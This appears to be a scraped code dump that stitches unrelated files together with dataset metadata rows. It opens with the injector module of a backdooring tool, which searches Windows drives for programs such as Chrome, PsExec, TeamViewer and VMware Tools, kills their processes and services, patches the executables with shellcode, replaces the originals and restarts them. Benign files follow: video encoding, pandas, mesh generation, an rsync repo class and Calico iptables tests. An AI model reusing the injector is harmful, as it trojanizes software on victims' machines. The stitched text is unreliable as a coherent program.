if self.SHELL not in dir(self.flItms['bintype']):
print "The following %ss are available: (use -s)" % str(self.flItms['bintype']).split(".")[1]
for item in dir(self.flItms['bintype']):
#print item
if "__" in item:
continue
elif "returnshellcode" == item or "pack_ip_addresses" == item or "eat_code_caves" == item:
continue
else:
print " {0}".format(item)
return False
#else:
# shell_cmd = self.SHELL + "()"
self.flItms['shells'] = self.flItms['bintype'](self.HOST, self.PORT, self.SUPPLIED_SHELLCODE)
self.flItms['allshells'] = getattr(self.flItms['shells'], self.SHELL)(self.flItms, self.flItms['CavesPicked'])
self.flItms['shellcode'] = self.flItms['shells'].returnshellcode()
def injector(self):
"""
The injector module will hunt and injection shellcode into
targets that are in the list_of_targets dict.
Data format DICT: {process_name_to_backdoor :
[('dependencies to kill', ),
'service to kill', restart=True/False],
}
"""
list_of_targets = {'chrome.exe':
[('chrome.exe', ), None, True], 'hamachi-2.exe':
[('hamachi-2.exe', ), "Hamachi2Svc", True],
'tcpview.exe': [('tcpview.exe',), None, True],
#'rpcapd.exe':
#[('rpcapd.exe'), None, False],
'psexec.exe':
[('psexec.exe',), 'PSEXESVC.exe', False],
'vncserver.exe':
[('vncserver.exe', ), 'vncserver', True],
# must append code cave for vmtoolsd.exe
'vmtoolsd.exe':
[('vmtools.exe', 'vmtoolsd.exe'), 'VMTools', True],
'nc.exe': [('nc.exe', ), None, False],
'Start Tor Browser.exe':
[('Start Tor Browser.exe', ), None, False],
'procexp.exe': [('procexp.exe',
'procexp64.exe'), None, True],
'procmon.exe': [('procmon.exe',
'procmon64.exe'), None, True],
'TeamViewer.exe': [('tv_x64.exe',
'tv_x32.exe'), None, True]
}
print "[*] Beginning injector module"
os_name = os.name
if os_name == 'nt':
if "PROGRAMFILES(x86)" in os.environ:
print "-You have a 64 bit system"
system_type = 64
else:
print "-You have a 32 bit system"
system_type = 32
else:
print "This works only on windows. :("
sys.exit()
winversion = platform.version()
rootdir = os.path.splitdrive(sys.executable)[0]
#print rootdir
targetdirs = []
excludedirs = []
#print system_info
winXP2003x86targetdirs = [rootdir + '\\']
winXP2003x86excludedirs = [rootdir + '\\Windows\\',
rootdir + '\\RECYCLER\\',
'\\VMWareDnD\\']
vista7win82012x64targetdirs = [rootdir + '\\']
vista7win82012x64excludedirs = [rootdir + '\\Windows\\',
rootdir + '\\RECYCLER\\',
'\\VMwareDnD\\']
#need win2003, win2008, win8
if "5.0." in winversion:
print "-OS is 2000"
targetdirs = targetdirs + winXP2003x86targetdirs
excludedirs = excludedirs + winXP2003x86excludedirs
elif "5.1." in winversion:
print "-OS is XP"
if system_type == 64:
targetdirs.append(rootdir + '\\Program Files (x86)\\')
excludedirs.append(vista7win82012x64excludedirs)
else:
targetdirs = targetdirs + winXP2003x86targetdirs
excludedirs = excludedirs + winXP2003x86excludedirs
elif "5.2." in winversion:
print "-OS is 2003"
if system_type == 64:
targetdirs.append(rootdir + '\\Program Files (x86)\\')
excludedirs.append(vista7win82012x64excludedirs)
else:
targetdirs = targetdirs + winXP2003x86targetdirs
excludedirs = excludedirs + winXP2003x86excludedirs
elif "6.0." in winversion:
print "-OS is Vista/2008"
if system_type == 64:
targetdirs = targetdirs + vista7win82012x64targetdirs
excludedirs = excludedirs + vista7win82012x64excludedirs
else:
targetdirs.append(rootdir + '\\Program Files\\')
excludedirs.append(rootdir + '\\Windows\\')
elif "6.1." in winversion:
print "-OS is Win7/2008"
if system_type == 64:
targetdirs = targetdirs + vista7win82012x64targetdirs
excludedirs = excludedirs + vista7win82012x64excludedirs
else:
targetdirs.append(rootdir + '\\Program Files\\')
excludedirs.append(rootdir + '\\Windows\\')
elif "6.2." in winversion:
print "-OS is Win8/2012"
targetdirs = targetdirs + vista7win82012x64targetdirs
excludedirs = excludedirs + vista7win82012x64excludedirs
filelist = set()
exclude = False
for path in targetdirs:
for root, subFolders, files in os.walk(path):
for directory in excludedirs:
if directory.lower() in root.lower():
#print directory.lower(), root.lower()
#print "Path not allowed", root
exclude = True
#print exclude
break
if exclude is False:
for _file in files:
f = os.path.join(root, _file)
for target, items in list_of_targets.iteritems():
if target.lower() == _file.lower():
#print target, f
print "-- Found the following file:", root + '\\' + _file
filelist.add(f)
#print exclude
exclude = False
#grab tasklist
process_list = []
all_process = os.popen("tasklist.exe")
ap = all_process.readlines()
all_process.close()
ap.pop(0) # remove blank line
ap.pop(0) # remove header line
ap.pop(0) # remove this ->> =======
for process in ap:
process_list.append(process.split())
#print process_list
#print filelist
for target in filelist:
service_target = False
running_proc = False
#get filename
#support_result = support_check(target, 0)
#if support_result is False:
# continue
filename = os.path.basename(target)
for process in process_list:
#print process
for setprocess, items in list_of_targets.iteritems():
if setprocess.lower() in target.lower():
#print setprocess, process
for item in items[0]:
if item.lower() in [x.lower() for x in process]:
print "- Killing process:", item
try:
#print process[1]
os.system("taskkill /F /PID %i" %
int(process[1]))
running_proc = True
except Exception as e:
print str(e)
if setprocess.lower() in [x.lower() for x in process]:
#print True, items[0], items[1]
if items[1] is not None:
print "- Killing Service:", items[1]
try:
os.system('net stop %s' % items[1])
except Exception as e:
print str(e)
service_target = True
time.sleep(1)
#backdoor the targets here:
print "*" * 50
self.FILE = target
self.OUTPUT = os.path.basename(self.FILE + '.bd')
print "self.OUTPUT", self.OUTPUT
print "- Backdooring:", self.FILE
result = self.patch_pe()
if result:
pass
else:
continue
shutil.copy2(self.FILE, self.FILE + self.SUFFIX)
os.chmod(self.FILE, stat.S_IRWXU | stat.S_IRWXG | stat.S_IRWXO)
time.sleep(1)
try:
os.unlink(self.FILE)
except:
print "unlinking error"
time.sleep(.5)
try:
shutil.copy2(self.OUTPUT, self.FILE)
except:
os.system('move {0} {1}'.format(self.FILE, self.OUTPUT))
time.sleep(.5)
os.remove(self.OUTPUT)
print (" - The original file {0} has been renamed to {1}".format(self.FILE,
self.FILE + self.SUFFIX))
if self.DELETE_ORIGINAL is True:
print "!!Warning Deleteing Original File!!"
os.remove(self.FILE + self.SUFFIX)
if service_target is True:
#print "items[1]:", list_of_targets[filename][1]
os.system('net start %s' % list_of_targets[filename][1])
else:
try:
if (list_of_targets[filename][2] is True and
running_proc is True):
subprocess.Popen([self.FILE, ])
print "- Restarting:", self.FILE
else:
print "-- %s was not found online - not restarting" % self.FILE
except:
if (list_of_targets[filename.lower()][2] is True and
running_proc is True):
subprocess.Popen([self.FILE, ])
print "- Restarting:", self.FILE
else:
print "-- %s was not found online - not restarting" % self.FILE
| gpl-3.0 | -1,369,329,645,116,319,000 | 45.241232 | 154 | 0.514337 | false | 3.941378 | false | false | false |
learningequality/video-vectorization | video_processing/processors/opencv_video_encoder.py | 1 | 1460 | """A video encoder processor that uses OpenCV to write video frames to a file.
A wrapper around the OpenCV VideoWriter class.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from video_processing import stream_processor
import cv2
class OpenCVVideoEncoderProcessor(stream_processor.ProcessorBase):
"""Processor for encoding video using OpenCV."""
def __init__(self, configuration):
self._output_video_file = configuration.get('output_video_file', '')
self._video_stream_name = configuration.get('video_stream_name', 'video')
self._fourcc_string = configuration.get('fourcc', 'DIVX')
self._index = 0
def open(self, stream_set):
fourcc = cv2.VideoWriter_fourcc(*self._fourcc_string)
frame_rate = stream_set.frame_rate_hz
header = stream_set.stream_headers[
self._video_stream_name].header_data
self._video_writer = cv2.VideoWriter(self._output_video_file, fourcc,
frame_rate,
(header.image_width,
header.image_height))
return stream_set
def process(self, frame_set):
if frame_set.get(self._video_stream_name, False):
video_frame = frame_set[self._video_stream_name].data
self._video_writer.write(video_frame)
return frame_set
def close(self):
self._video_writer.release()
return []
| mit | -5,255,766,905,365,025,000 | 33.761905 | 78 | 0.652055 | false | 3.924731 | false | false | false |
robmarano/nyu-python | course-2/session-7/pandas/df_basics.py | 1 | 2677 | #!/usr/bin/env python3
try:
# for Python 2.x
import StringIO
except:
# for Python 3.x
import io
import csv
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import re
# define data
csv_input = """timestamp,title,reqid
2016-07-23 11:05:08,SVP,2356556-AS
2016-12-12 01:23:33,VP,5567894-AS
2016-09-13 12:43:33,VP,3455673-AS
2016-09-13 19:43:33,EVP,8455673-AS
2016-09-30 11:43:33,VP,9455673-AS
2016-08-02 01:23:33,VP,5698765-AS
2016-04-22 01:23:33,VP,1234556-AS
"""
# load data
try:
# for Python 2.x
f = StringIO.StringIO(csv_input)
except:
# for Python 3.x
f = io.StringIO(csv_input)
reader = csv.reader(f, delimiter=',')
for row in reader:
print('\t'.join(row))
# reset file pointer position to beginning of file
f.seek(0)
# create pandas dataframe
#df = pd.read_csv(io.StringIO(csv_input))
df = pd.read_csv(f)
print(df.head())
print(df.info())
print(df)
df['date'] = pd.DatetimeIndex(df.timestamp).normalize()
print(df)
print(df.index)
#df = df.drop('timestamp',axis=1)
df.drop('timestamp', axis=1, inplace=True)
#df = df.reindex(df.reqid, fill_value=0)
#df = df.reindex(df.reqid, method='bfill')
#print(df)
#print(df.index)
#i = df[((df.title == 'SVP') & (df.reqid == '3455673-AS'))].index
#df.drop(df.index[0],inplace=True)
#df.drop(i,inplace=True)
#i = df.index[0]
#df = df.drop(i)
#print(df)
#print(i)
print(type(df['date'][0]))
#df = df.sort_values(by='date',axis=0,ascending=True)
df.sort_values(by='date',axis=0,ascending=True,inplace=True)
print(df)
df['weekday'] = df['date'].apply( lambda x: x.dayofweek)
# setup date processing
now_string = '2016-10-01 08:01:20'
past_by_days = 30
time_delta = pd.to_timedelta('{} days'.format(past_by_days))
print(time_delta)
#now = pd.tslib.Timestamp('2016-10-01 08:01:20')
now = pd.Timestamp(now_string)
now_norm = now.normalize()
print(now_norm)
now_start = now_norm - time_delta
print(now_start)
# process
ddf = df.loc[((df['date'] >= now_start) & (df['date'] <= now_norm))]
print(ddf)
print('number of observations found in filtered df = {}'.format(len(ddf)))
print(len(ddf.columns))
# histogram of number of observations by date
df_grouped_date = df.groupby(['date'])
df_date_count = df_grouped_date['reqid'].aggregate(['count'])
#df_date_count = df_grouped_date.aggregate(['count'])
print(df_date_count)
#exclude_cols = ['title count']
#df_date_count.ix[:, df_date_count.columns.difference(exclude_cols)].plot(kind='bar')
df_date_count.ix[:, df_date_count.columns].plot(kind='bar')
plt.legend(loc='best').get_texts()[0].set_text('Reqs Added Per Day')
file_name = 'myBar'
file_name = re.sub('\s+','_',file_name)
plt.savefig(file_name)
plt.show()
| mit | -4,452,807,237,788,922,400 | 22.482456 | 85 | 0.680613 | false | 2.561722 | false | false | false |
mathLab/RBniCS | tutorials/11_quasi_geostrophic/data/generate_mesh.py | 1 | 1376 | # Copyright (C) 2015-2021 by the RBniCS authors
#
# This file is part of RBniCS.
#
# SPDX-License-Identifier: LGPL-3.0-or-later
from dolfin import *
from mshr import *
# Create mesh
domain = Rectangle(Point(0., 0.), Point(1., 1.))
mesh = generate_mesh(domain, 30)
# Create subdomains
subdomains = MeshFunction("size_t", mesh, 2)
subdomains.set_all(0)
# Create boundaries
class Left(SubDomain):
def inside(self, x, on_boundary):
return on_boundary and abs(x[0] - 0.) < DOLFIN_EPS
class Right(SubDomain):
def inside(self, x, on_boundary):
return on_boundary and abs(x[0] - 1.) < DOLFIN_EPS
class Bottom(SubDomain):
def inside(self, x, on_boundary):
return on_boundary and abs(x[1] - 0.) < DOLFIN_EPS
class Top(SubDomain):
def inside(self, x, on_boundary):
return on_boundary and abs(x[1] - 1.) < DOLFIN_EPS
boundaries = MeshFunction("size_t", mesh, mesh.topology().dim() - 1)
bottom = Bottom()
bottom.mark(boundaries, 1)
right = Right()
right.mark(boundaries, 2)
top = Top()
top.mark(boundaries, 3)
left = Left()
left.mark(boundaries, 4)
# Save
File("square.xml") << mesh
File("square_physical_region.xml") << subdomains
File("square_facet_region.xml") << boundaries
XDMFFile("square.xdmf").write(mesh)
XDMFFile("square_physical_region.xdmf").write(subdomains)
XDMFFile("square_facet_region.xdmf").write(boundaries)
| lgpl-3.0 | 7,467,292,417,435,287,000 | 23.571429 | 68 | 0.68532 | false | 2.946467 | false | false | false |
Hummer12007/pomu | pomu/repo/remote/rsync.py | 1 | 1673 | """A class for remote rsync repos"""
from os import rmdir, mkfifo, unlink, path
from subprocess import run
from tempfile import mkdtemp
from pomu.repo.remote.remote import RemoteRepo, normalize_key
from pomu.util.result import Result
class RemoteRsyncRepo(RemoteRepo):
"""A class responsible for rsync remotes"""
def __init__(self, url):
self.uri = url
def __enter__(self):
pass
def __exit__(self, *_):
pass
def fetch_tree(self):
"""Returns repos hierarchy"""
if hasattr(self, '_tree'):
return self._tree
d = mkdtemp()
p = run('rsync', '-rn', '--out-format="%n"', self.uri, d)
rmdir(d)
if p.returncode:
return Result.Err()
self._tree = ['/' + x for x in p.stdout.split('\n')]
return self._tree
def fetch_subtree(self, key):
"""Lists a subtree"""
k = normalize_key(key, True)
self.fetch_tree()
dic = dict(self._tree)
if k not in dic:
return []
l = len(key)
return Result.Ok(
[tpath[l:] for tpath in self.fetch_tree() if tpath.startswith(k)])
def fetch_file(self, key):
"""Fetches a file from the repo"""
k = normalize_key(key)
self.fetch_tree()
dic = dict(self._tree)
if k not in dic:
return Result.Err()
d = mkdtemp()
fip = path.join(d, 'fifo')
mkfifo(fip)
p = run('rsync', self.uri.rstrip('/') + key, fip)
fout = fip.read()
unlink(fip)
rmdir(d)
if p.returncode:
return Result.Err()
return Result.Ok(fout)
| gpl-2.0 | -8,406,564,571,039,926,000 | 27.355932 | 82 | 0.537358 | false | 3.759551 | false | false | false |
TrimBiggs/calico | calico/felix/test/test_fiptgenerator.py | 1 | 22422 | # -*- coding: utf-8 -*-
# Copyright 2015 Metaswitch Networks
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
felix.test.test_fiptgenerator.py
~~~~~~~~~~~~~~~~~~~~~~~~~
Tests of iptables rules generation function.
"""
import logging
from collections import OrderedDict
from calico.felix.selectors import parse_selector
from mock import Mock
from calico.datamodel_v1 import TieredPolicyId
from calico.felix.fiptables import IptablesUpdater
from calico.felix.profilerules import UnsupportedICMPType
from calico.felix.test.base import BaseTestCase, load_config
_log = logging.getLogger(__name__)
DEFAULT_MARK = '--append %s --jump MARK --set-mark 0x1000000/0x1000000'
DEFAULT_UNMARK = (
'--append %s '
'--match comment --comment "No match, fall through to next profile" '
'--jump MARK --set-mark 0/0x1000000'
)
INPUT_CHAINS = {
"Default": [
'--append felix-INPUT ! --in-interface tap+ --jump RETURN',
'--append felix-INPUT --match conntrack --ctstate INVALID --jump DROP',
'--append felix-INPUT --match conntrack --ctstate RELATED,ESTABLISHED --jump ACCEPT',
'--append felix-INPUT --protocol tcp --destination 123.0.0.1 --dport 1234 --jump ACCEPT',
'--append felix-INPUT --protocol udp --sport 68 --dport 67 '
'--jump ACCEPT',
'--append felix-INPUT --protocol udp --dport 53 --jump ACCEPT',
'--append felix-INPUT --jump DROP -m comment --comment "Drop all packets from endpoints to the host"',
],
"IPIP": [
'--append felix-INPUT --protocol 4 --match set ! --match-set felix-hosts src --jump DROP',
'--append felix-INPUT ! --in-interface tap+ --jump RETURN',
'--append felix-INPUT --match conntrack --ctstate INVALID --jump DROP',
'--append felix-INPUT --match conntrack --ctstate RELATED,ESTABLISHED --jump ACCEPT',
'--append felix-INPUT --protocol tcp --destination 123.0.0.1 --dport 1234 --jump ACCEPT',
'--append felix-INPUT --protocol udp --sport 68 --dport 67 '
'--jump ACCEPT',
'--append felix-INPUT --protocol udp --dport 53 --jump ACCEPT',
'--append felix-INPUT --jump DROP -m comment --comment "Drop all packets from endpoints to the host"',
],
"Return": [
'--append felix-INPUT ! --in-interface tap+ --jump RETURN',
'--append felix-INPUT --match conntrack --ctstate INVALID --jump DROP',
'--append felix-INPUT --match conntrack --ctstate RELATED,ESTABLISHED --jump ACCEPT',
'--append felix-INPUT --jump ACCEPT --protocol ipv6-icmp --icmpv6-type 130',
'--append felix-INPUT --jump ACCEPT --protocol ipv6-icmp --icmpv6-type 131',
'--append felix-INPUT --jump ACCEPT --protocol ipv6-icmp --icmpv6-type 132',
'--append felix-INPUT --jump ACCEPT --protocol ipv6-icmp --icmpv6-type 133',
'--append felix-INPUT --jump ACCEPT --protocol ipv6-icmp --icmpv6-type 135',
'--append felix-INPUT --jump ACCEPT --protocol ipv6-icmp --icmpv6-type 136',
'--append felix-INPUT --protocol udp --sport 546 --dport 547 --jump ACCEPT',
'--append felix-INPUT --protocol udp --dport 53 --jump ACCEPT',
'--append felix-INPUT --jump felix-FROM-ENDPOINT',
]
}
SELECTOR_A_EQ_B = parse_selector("a == 'b'")
RULES_TESTS = [
{
"ip_version": 4,
"tag_to_ipset": {},
"sel_to_ipset": {SELECTOR_A_EQ_B: "a-eq-b"},
"profile": {
"id": "prof1",
"inbound_rules": [
{"src_selector": SELECTOR_A_EQ_B,
"action": "next-tier"}
],
"outbound_rules": [
{"dst_selector": SELECTOR_A_EQ_B,
"action": "next-tier"}
]
},
"updates": {
'felix-p-prof1-i':
[
DEFAULT_MARK % "felix-p-prof1-i",
'--append felix-p-prof1-i '
'--match set --match-set a-eq-b src '
'--jump MARK --set-mark 0x2000000/0x2000000',
'--append felix-p-prof1-i --match mark '
'--mark 0x2000000/0x2000000 --jump RETURN',
DEFAULT_UNMARK % "felix-p-prof1-i",
],
'felix-p-prof1-o':
[
DEFAULT_MARK % "felix-p-prof1-o",
'--append felix-p-prof1-o '
'--match set --match-set a-eq-b dst '
'--jump MARK --set-mark 0x2000000/0x2000000',
'--append felix-p-prof1-o --match mark '
'--mark 0x2000000/0x2000000 --jump RETURN',
DEFAULT_UNMARK % "felix-p-prof1-o",
]
},
},
{
"ip_version": 4,
"tag_to_ipset": {
"src-tag": "src-tag-name",
"dst-tag": "dst-tag-name"
},
"profile": {
"id": "prof1",
"inbound_rules": [
{"src_net": "10.0.0.0/8"}
],
"outbound_rules": [
{"protocol": "icmp",
"src_net": "10.0.0.0/8",
"icmp_type": 7,
"icmp_code": 123}
]
},
"updates": {
'felix-p-prof1-i':
[
DEFAULT_MARK % "felix-p-prof1-i",
'--append felix-p-prof1-i --source 10.0.0.0/8 --jump RETURN',
DEFAULT_UNMARK % "felix-p-prof1-i",
],
'felix-p-prof1-o':
[
DEFAULT_MARK % "felix-p-prof1-o",
"--append felix-p-prof1-o --protocol icmp --source "
"10.0.0.0/8 --match icmp --icmp-type 7/123 --jump RETURN",
DEFAULT_UNMARK % "felix-p-prof1-o",
]
},
},
{
"ip_version": 4,
"tag_to_ipset": {
"src-tag": "src-tag-name",
"dst-tag": "dst-tag-name"
},
"profile": {
"id": "prof1",
"inbound_rules": [
{"protocol": "icmp",
"src_net": "10.0.0.0/8",
"icmp_type": 7
}
],
"outbound_rules": [
{"protocol": "tcp",
"src_ports": [0, "2:3", 4, 5, 6, 7, 8, 9, 10, 11, 12, 13,
14, 15, 16, 17]
}
]
},
"updates": {
'felix-p-prof1-i':
[
DEFAULT_MARK % "felix-p-prof1-i",
"--append felix-p-prof1-i --protocol icmp --source 10.0.0.0/8 "
"--match icmp --icmp-type 7 --jump RETURN",
DEFAULT_UNMARK % "felix-p-prof1-i",
],
'felix-p-prof1-o':
[
DEFAULT_MARK % "felix-p-prof1-o",
"--append felix-p-prof1-o --protocol tcp "
"--match multiport --source-ports 0,2:3,4,5,6,7,8,9,10,11,12,13,14,15 "
"--jump RETURN",
"--append felix-p-prof1-o --protocol tcp "
"--match multiport --source-ports 16,17 "
"--jump RETURN",
DEFAULT_UNMARK % "felix-p-prof1-o",
]
},
},
{
"ip_version": 6,
"tag_to_ipset": {
"src-tag": "src-tag-name",
"dst-tag": "dst-tag-name"
},
"profile": {
"id": "prof1",
"inbound_rules": [
{"protocol": "icmpv6",
"src_net": "1234::beef",
"icmp_type": 7
}
],
"outbound_rules": [
{"protocol": "icmpv6",
"src_net": "1234::beef",
"icmp_type": 7,
"action": "deny"
}
]
},
"updates": {
'felix-p-prof1-i':
[
DEFAULT_MARK % "felix-p-prof1-i",
"--append felix-p-prof1-i --protocol icmpv6 --source "
"1234::beef --match icmp6 --icmpv6-type 7 --jump RETURN",
DEFAULT_UNMARK % "felix-p-prof1-i",
],
'felix-p-prof1-o':
[
DEFAULT_MARK % "felix-p-prof1-o",
"--append felix-p-prof1-o --protocol icmpv6 --source "
"1234::beef --match icmp6 --icmpv6-type 7 --jump DROP",
DEFAULT_UNMARK % "felix-p-prof1-o",
]
},
},
]
FROM_ENDPOINT_CHAIN = [
# Always start with a 0 MARK.
'--append felix-from-abcd --jump MARK --set-mark 0/0x1000000',
# From chain polices the MAC address.
'--append felix-from-abcd --match mac ! --mac-source aa:22:33:44:55:66 '
'--jump DROP -m comment --comment '
'"Incorrect source MAC"',
# Now the tiered policies. For each tier we reset the "next tier" mark.
'--append felix-from-abcd --jump MARK --set-mark 0/0x2000000 '
'--match comment --comment "Start of tier tier_1"',
# Then, for each policies, we jump to the policies, and check if it set the
# accept mark, which immediately accepts.
'--append felix-from-abcd '
'--match mark --mark 0/0x2000000 --jump felix-p-t1p1-o',
'--append felix-from-abcd '
'--match mark --mark 0x1000000/0x1000000 '
'--match comment --comment "Return if policy accepted" '
'--jump RETURN',
'--append felix-from-abcd '
'--match mark --mark 0/0x2000000 --jump felix-p-t1p2-o',
'--append felix-from-abcd '
'--match mark --mark 0x1000000/0x1000000 '
'--match comment --comment "Return if policy accepted" '
'--jump RETURN',
# Then, at the end of the tier, drop if nothing in the tier did a
# "next-tier"
'--append felix-from-abcd '
'--match mark --mark 0/0x2000000 '
'--match comment --comment "Drop if no policy in tier passed" '
'--jump DROP',
# Now the second tier...
'--append felix-from-abcd '
'--jump MARK --set-mark 0/0x2000000 --match comment '
'--comment "Start of tier tier_2"',
'--append felix-from-abcd '
'--match mark --mark 0/0x2000000 --jump felix-p-t2p1-o',
'--append felix-from-abcd '
'--match mark --mark 0x1000000/0x1000000 --match comment '
'--comment "Return if policy accepted" --jump RETURN',
'--append felix-from-abcd '
'--match mark --mark 0/0x2000000 --match comment '
'--comment "Drop if no policy in tier passed" --jump DROP',
# Jump to the first profile.
'--append felix-from-abcd --jump felix-p-prof-1-o',
# Short-circuit: return if the first profile matched.
'--append felix-from-abcd --match mark --mark 0x1000000/0x1000000 '
'--match comment --comment "Profile accepted packet" '
'--jump RETURN',
# Jump to second profile.
'--append felix-from-abcd --jump felix-p-prof-2-o',
# Return if the second profile matched.
'--append felix-from-abcd --match mark --mark 0x1000000/0x1000000 '
'--match comment --comment "Profile accepted packet" '
'--jump RETURN',
# Drop the packet if nothing matched.
'--append felix-from-abcd --jump DROP -m comment --comment '
'"Packet did not match any profile (endpoint e1)"'
]
TO_ENDPOINT_CHAIN = [
# Always start with a 0 MARK.
'--append felix-to-abcd --jump MARK --set-mark 0/0x1000000',
# Then do the tiered policies in order. Tier 1:
'--append felix-to-abcd --jump MARK --set-mark 0/0x2000000 '
'--match comment --comment "Start of tier tier_1"',
'--append felix-to-abcd --match mark --mark 0/0x2000000 '
'--jump felix-p-t1p1-i',
'--append felix-to-abcd --match mark --mark 0x1000000/0x1000000 '
'--match comment --comment "Return if policy accepted" --jump RETURN',
'--append felix-to-abcd --match mark --mark 0/0x2000000 '
'--jump felix-p-t1p2-i',
'--append felix-to-abcd --match mark --mark 0x1000000/0x1000000 '
'--match comment --comment "Return if policy accepted" --jump RETURN',
'--append felix-to-abcd --match mark --mark 0/0x2000000 '
'--match comment --comment "Drop if no policy in tier passed" '
'--jump DROP',
# Tier 2:
'--append felix-to-abcd --jump MARK --set-mark 0/0x2000000 '
'--match comment --comment "Start of tier tier_2"',
'--append felix-to-abcd --match mark --mark 0/0x2000000 '
'--jump felix-p-t2p1-i',
'--append felix-to-abcd --match mark --mark 0x1000000/0x1000000 '
'--match comment --comment "Return if policy accepted" '
'--jump RETURN',
'--append felix-to-abcd --match mark --mark 0/0x2000000 '
'--match comment --comment "Drop if no policy in tier passed" '
'--jump DROP',
# Jump to first profile and return iff it matched.
'--append felix-to-abcd --jump felix-p-prof-1-i',
'--append felix-to-abcd --match mark --mark 0x1000000/0x1000000 '
'--match comment --comment "Profile accepted packet" '
'--jump RETURN',
# Jump to second profile and return iff it matched.
'--append felix-to-abcd --jump felix-p-prof-2-i',
'--append felix-to-abcd --match mark --mark 0x1000000/0x1000000 '
'--match comment --comment "Profile accepted packet" '
'--jump RETURN',
# Drop anything that doesn't match.
'--append felix-to-abcd --jump DROP -m comment --comment '
'"Packet did not match any profile (endpoint e1)"'
]
class TestGlobalChains(BaseTestCase):
def setUp(self):
super(TestGlobalChains, self).setUp()
host_dict = {
"MetadataAddr": "123.0.0.1",
"MetadataPort": "1234",
"DefaultEndpointToHostAction": "DROP"
}
self.config = load_config("felix_default.cfg", host_dict=host_dict)
self.iptables_generator = self.config.plugins["iptables_generator"]
self.m_iptables_updater = Mock(spec=IptablesUpdater)
def test_build_input_chain(self):
chain, deps = self.iptables_generator.filter_input_chain(ip_version=4)
self.assertEqual(chain, INPUT_CHAINS["Default"])
self.assertEqual(deps, set())
def test_build_input_chain_ipip(self):
chain, deps = self.iptables_generator.filter_input_chain(
ip_version=4,
hosts_set_name="felix-hosts")
self.assertEqual(chain, INPUT_CHAINS["IPIP"])
self.assertEqual(deps, set())
def test_build_input_chain_return(self):
host_dict = {
"MetadataAddr": "123.0.0.1",
"MetadataPort": "1234",
"DefaultEndpointToHostAction": "RETURN"
}
config = load_config("felix_default.cfg", host_dict=host_dict)
chain, deps = config.plugins["iptables_generator"].filter_input_chain(
ip_version=6)
self.assertEqual(chain, INPUT_CHAINS["Return"])
self.assertEqual(deps, set(["felix-FROM-ENDPOINT"]))
class TestRules(BaseTestCase):
def setUp(self):
super(TestRules, self).setUp()
host_dict = {
"MetadataAddr": "123.0.0.1",
"MetadataPort": "1234",
"DefaultEndpointToHostAction": "DROP"
}
self.config = load_config("felix_default.cfg", host_dict=host_dict)
self.iptables_generator = self.config.plugins["iptables_generator"]
self.m_iptables_updater = Mock(spec=IptablesUpdater)
def test_profile_chain_names(self):
chain_names = self.iptables_generator.profile_chain_names("prof1")
self.assertEqual(chain_names, set(["felix-p-prof1-i", "felix-p-prof1-o"]))
def test_tiered_policy_chain_names(self):
chain_names = self.iptables_generator.profile_chain_names(
TieredPolicyId("tier", "pol")
)
self.assertEqual(chain_names,
set(['felix-p-tier/pol-o',
'felix-p-tier/pol-i']))
def test_split_port_lists(self):
self.assertEqual(
self.iptables_generator._split_port_lists([1, 2, 3, 4, 5, 6, 7, 8, 9,
10, 11, 12, 13, 14, 15]),
[['1', '2', '3', '4', '5', '6', '7', '8', '9',
'10', '11', '12', '13', '14', '15']]
)
self.assertEqual(
self.iptables_generator._split_port_lists([1, 2, 3, 4, 5, 6, 7, 8, 9,
10, 11, 12, 13, 14, 15, 16]),
[['1', '2', '3', '4', '5', '6', '7', '8', '9',
'10', '11', '12', '13', '14', '15'],
['16']]
)
self.assertEqual(
self.iptables_generator._split_port_lists([1, "2:3", 4, 5, 6, 7, 8, 9,
10, 11, 12, 13, 14, 15, 16, 17]),
[['1', '2:3', '4', '5', '6', '7', '8', '9',
'10', '11', '12', '13', '14', '15'],
['16', '17']]
)
def test_rules_generation(self):
for test in RULES_TESTS:
updates, deps = self.iptables_generator.profile_updates(
test["profile"]["id"],
test["profile"],
test["ip_version"],
test["tag_to_ipset"],
selector_to_ipset=test.get("sel_to_ipset", {}),
on_allow=test.get("on_allow", "RETURN"),
on_deny=test.get("on_deny", "DROP")
)
self.assertEqual((updates, deps), (test["updates"], {}))
def test_unknown_action(self):
updates, deps = self.iptables_generator.profile_updates(
"prof1",
{
"inbound_rules": [{"action": "unknown"}],
"outbound_rules": [{"action": "unknown"}],
},
4,
{},
selector_to_ipset={},
)
self.maxDiff = None
# Should get back a drop rule.
drop_rules_i = self.iptables_generator.drop_rules(
4,
"felix-p-prof1-i",
None,
"ERROR failed to parse rules",
)
drop_rules_o = self.iptables_generator.drop_rules(
4,
"felix-p-prof1-o",
None,
"ERROR failed to parse rules",
)
self.assertEqual(
updates,
{
'felix-p-prof1-i':
['--append felix-p-prof1-i --jump MARK '
'--set-mark 0x1000000/0x1000000'] +
drop_rules_i +
['--append felix-p-prof1-i --match comment '
'--comment "No match, fall through to next profile" '
'--jump MARK --set-mark 0/0x1000000'],
'felix-p-prof1-o':
['--append felix-p-prof1-o --jump MARK '
'--set-mark 0x1000000/0x1000000'] +
drop_rules_o +
['--append felix-p-prof1-o --match comment '
'--comment "No match, fall through to next profile" '
'--jump MARK --set-mark 0/0x1000000']
}
)
def test_bad_icmp_type(self):
with self.assertRaises(UnsupportedICMPType):
self.iptables_generator._rule_to_iptables_fragments_inner(
"foo", {"icmp_type": 255}, 4, {}, {}
)
def test_bad_protocol_with_ports(self):
with self.assertRaises(AssertionError):
self.iptables_generator._rule_to_iptables_fragments_inner(
"foo", {"protocol": "10", "src_ports": [1]}, 4, {}, {}
)
class TestEndpoint(BaseTestCase):
def setUp(self):
super(TestEndpoint, self).setUp()
self.config = load_config("felix_default.cfg")
self.iptables_generator = self.config.plugins["iptables_generator"]
self.m_iptables_updater = Mock(spec=IptablesUpdater)
def test_endpoint_chain_names(self):
self.assertEqual(
self.iptables_generator.endpoint_chain_names("abcd"),
set(["felix-to-abcd", "felix-from-abcd"]))
def test_get_endpoint_rules(self):
expected_result = (
{
'felix-from-abcd': FROM_ENDPOINT_CHAIN,
'felix-to-abcd': TO_ENDPOINT_CHAIN
},
{
